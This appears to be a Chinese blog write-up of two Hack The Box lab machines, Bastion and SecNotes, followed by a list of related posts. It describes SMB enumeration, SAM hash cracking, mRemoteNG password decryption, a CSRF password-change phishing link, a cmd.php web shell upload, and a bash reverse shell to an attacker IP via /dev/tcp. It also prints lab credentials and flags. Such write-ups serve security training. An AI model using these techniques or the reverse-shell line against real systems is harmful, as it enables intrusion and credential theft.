HTB-oscplike-Bastian+Secnotes

最新推荐文章于 2024-05-15 20:54:03 发布
最新推荐文章于 2024-05-15 20:54:03 发布
阅读量2.3k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/124132362
版权

HTB-oscplike-Bastian+Secnotes

Bastian

easy难度的bastion 靶机IP 10.10.10.134

sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open tcpwrapped

smbclient -N -L 10.10.10.134 看到
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
smbclient -N \\10.10.10.134\Backups 里面有note.txt和WindowsImageBackup
note.txt打开看到
Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

不要整个拿过去 那就挂载吧
mount -t cifs //10.10.10.134/backups /tmp -o user=,password=
进去找到两个vhd虚拟磁盘
guestmount --add /tmp/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /temp/
进去可以看到C:\Windows\System32\config\SAM
爆破得到L4mpje/bureaulampje
ssh连进去

翻来翻去翻到一个文件夹C:\Program Files (x86)\mremoteng
google了一下发现在 c:\users%user%\appdata\roaming\mremoteng\confcons.xml里会有密码的信息泄露
在里面找到Username=“Administrator” Domain=“” Password=“aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==”

这串密码不是base64 但是github上有工具专门解
解出来密码是 thXLHM96BeKL0ER2 连上去就行
742aa8e404a88fe208d375dc4da33446
44eab37c86624604149920f4ce5b98d1
请添加图片描述

Secnotes

medium难度的SecNotes 靶机IP 10.10.10.97

sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.10.97
80/tcp open http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0

80里可以注册登录 里面发现有改密码和contact us 栏目
请添加图片描述

一开始我以为又是xss的利用 测试发现不是 但发送的如果是链接会被点击
那就简单了 根据主页上面有一行

Please contact tyler@secnotes.htb using the contact link below with any questions.

以及改密码抓包的参数 构造
http://10.10.10.97/change_pass.php?password=111111&confirm_password=111111&submit=submit
在contact里发给他 钓鱼得到 tyler/111111 登录进去翻到
\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

smbclient -U tyler \\secnotes.htb\new-site 上去
上去发现我们到的是8808端口下 上传cmd.php然后连上去
拿到user的flag 9549d5f2555c5b06a263fd48e19fd3ec

同目录发现有一个很奇怪的bash.lnk 一个windows机子带个bash很不正常
同时根目录还有个ubantu.zip 那么会不会有可执行的bash呢
where.exe /R c:\ bash.* 看到有两个exe 随便挑一个

c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
bash.exe -c ‘bash -i >& /dev/tcp/10.10.14.19/7890 0>&1’

进去后是一个root的linux环境 但是root下面什么都没有
ls -la看到一个.bash_history 打开看到
smbclient -U ‘administrator%u6!4ZwgwOM#^OBf#Nwnh’ \\127.0.0.1\c$

直接连上去 都可以访问了 拿到flag
24187aa73e316d6341056bff327ca8e7

请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Oracle 加密代码
qdj_2002的专栏
02-20 365
Oracle 中提供了Wrap工具进行代码加密,但是其不能还原,所以在加密之后需要将原始代码管理好,以免丢失!具体操作如下 wrap iname=D:/oracle/unWrapFile.sql oname=d:/oracle/wrapFile.pbl 其中iname和oname分别指定了加密的源文件和加密后的文件。 
mRemoteNG 提示需要密码并报错
狗哥儿的博客
03-12 2280
错误描述: mRemoteNG 打开时提示需要密码,并且报错。如下 解决方法: 根据提示的路径,找到这个confCons.xml,删掉,并在配置文件所在的目录下找到confCons.xml.*.backup最近的备份文件,重命名成confCons.xml即可。 ...
HTB-Bastion
最新发布
2201_75378806的博客
05-15 919
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
HTB-oscplike-Object
m0_53302733的博客
04-21 3179
HTB-oscplike-Object hard难度的object 靶机IP 10.10.11.132 也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台 这台总共就一百来个人通了 sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132 80/tcp open http Microsoft IIS httpd 10.0 5985/tcp open http Microsoft HTTPAPI httpd
HTB-oscplike-Fuse+Intelligence
m0_53302733的博客
04-21 3920
HTB-oscplike-Fuse+Intelligence Fuse 除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了 htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了 medium难度的fuse 靶机IP 10.10.10.193 sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193 53/tcp open domain Simple DNS Plus 80/tcp
HTB-oscplike-sense+solidstate+node
m0_53302733的博客
03-30 1736
HTB-oscplike-sense+solidstate+node Sense easy难度的sense 靶机IP 10.10.10.60 nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.60 PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/http lighttpd 1.4.35 dirsearch看到changelog.txt
htb-bastion
qq_45766062的博客
02-22 638
bastion介绍 这是一个运行windows的机器,并且可以连ssh。 nmap 先是nmap扫一下: Nmap scan report for 10.10.10.134 Host is up (0.32s latency). Not shown: 994 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (proto
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
oscp——HTB——Optimum
王嘟嘟的博客
05-25 518
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 访问一下目标站点,看到是HFS 搜一下payload 发现可以直接使用msf打过去 拿到shell之后就可以拿到user的flag 这里我用cs又建立了一个稳定的连接 0x03 Webshell——Rootshell 首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描 使用MS16-098进行提权 ...
No.75-HackTheBox-windows-SecNotes-Walkthrough渗透学习
qq_34801745的博客
03-24 314
** HackTheBox-windows-SecNotes-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/151 靶机难度:中级(4.5/10) 靶机发布日期:2019年1月14日 靶机描述: SecNotes is a medium difficulty machine, which highlights...
HTB (hackthebox)Coder Insane靶机 User Flag WriteUp
qq_58869808的博客
04-06 8448
HTB Coder 靶机 UserFlag WriteUp
【Hack The Box】windows练习-- Intelligence
人间体佐菲的博客
11-17 675
【Hack The Box】windows练习-- Intelligence
废物的靶场日记 htb-oscp-beep+cronos+nineveh
m0_53302733的博客
03-29 1324
HTB-oscplike-beep+cronos+nineveh Beep easy难度的beep 靶机IP10.10.10.7 sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.7 访问80后发现是一个elastix searchsploit搜到php/webapps/18650.py 修改参数后发现有一个extension需要修改但是不知道是什么勾八 google elastix extension后发现是sip extension 用svwar
No.1-Bastion-难度简单-HTB-walkthrough
weixin_43851945的博客
01-10 1891
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
cozyhosting+htb
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作才能解决这个挑战。具体的解题步骤我无法提供,因为每个挑战都设计得非常独特,需要你自己进行思考和尝试。 如果你对Hack The Box平台或CozyHosting有进一步的问题,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值